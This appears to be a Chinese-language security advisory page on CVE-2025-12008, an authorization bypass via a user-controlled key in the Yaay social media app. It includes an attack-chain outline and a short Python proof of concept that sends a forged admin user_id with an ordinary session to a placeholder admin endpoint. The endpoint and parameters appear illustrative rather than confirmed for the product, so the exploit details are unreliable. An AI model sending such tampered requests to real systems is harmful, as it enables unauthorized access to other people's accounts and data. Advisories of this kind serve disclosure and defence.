CVE-2025-12008 CVSS 8.8 高危

CVE-2025-12008 Yaay授权绕过漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-12008

漏洞类型

授权绕过

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Yaay Social Media App

漏洞概述

APPYAP Technology开发的Yaay社交应用程序存在严重的安全漏洞，涉及通过用户控制密钥导致的授权绕过。该问题允许攻击者绕过访问控制列表（ACL）的约束，未经授权访问本应受限的功能。此漏洞影响从3.8.0到24102025的版本，可能泄露敏感信息或导致系统被完全控制。

技术细节

该漏洞的核心在于应用程序未能正确验证用户提交的“用户控制密钥”。在Yaay应用的逻辑中，服务器端直接信任客户端传递的某些参数（如用户ID、角色标识或API密钥），并将其作为权限判断的依据，而未在服务端进行严格的ACL校验。攻击者利用这一缺陷，可以通过篡改网络请求中的这些关键参数，伪装成高权限用户。由于CVSS向量显示无需认证（PR:N）但需要用户交互（UI:R），攻击可能结合社会工程学手段诱导用户访问恶意页面，进而利用浏览器自动发送的请求进行参数篡改。成功利用后，攻击者可获取系统的高机密性、完整性和可用性权限，执行任意受限操作。

攻击链分析

STEP 1

1. 侦察

攻击者识别出目标运行的是Yaay Social Media App受影响版本（3.8.0至24102025），并定位到包含敏感功能的API端点。

STEP 2

2. 诱导交互

由于漏洞需要用户交互（UI:R），攻击者构造恶意链接或网页，诱导受害者点击或访问。

STEP 3

3. 参数篡改

在发送给服务器的请求中，攻击者修改“用户控制密钥”参数（如将user_id改为目标管理员ID），试图绕过ACL检查。

STEP 4

4. 未授权访问

服务器端未正确校验篡改后的参数，直接授予了请求的权限，导致攻击者能够访问敏感数据或执行受限功能。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Vulnerability: Authorization bypass via User-Controlled Key
# Target: Yaay Social Media App (Affected Versions)

url = "https://target-app.com/api/v1/admin/settings"
headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/json",
    # Normal user session cookie
    "Cookie": "session_id=normal_user_session_token" 
}

# Exploit: Manipulate the user-controlled key (e.g., user_id or role_key)
# to impersonate an administrator or access restricted ACLs.
payload = {
    "user_id": "admin",  # Modified key to bypass authorization
    "action": "update_config"
}

response = requests.post(url, json=payload, headers=headers)

if response.status_code == 200:
    print("[+] Authorization bypass successful!")
    print(f"[+] Response: {response.text}")
else:
    print("[-] Failed to exploit")

影响范围

Yaay Social Media App 3.8.0 - 24102025

防御指南

临时缓解措施

如果无法立即升级，建议在网络边界部署WAF规则，检测并阻断包含异常参数篡改的请求。同时，暂时禁用受影响应用的非必要对外接口，并加强对管理员账户的异常登录监控。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表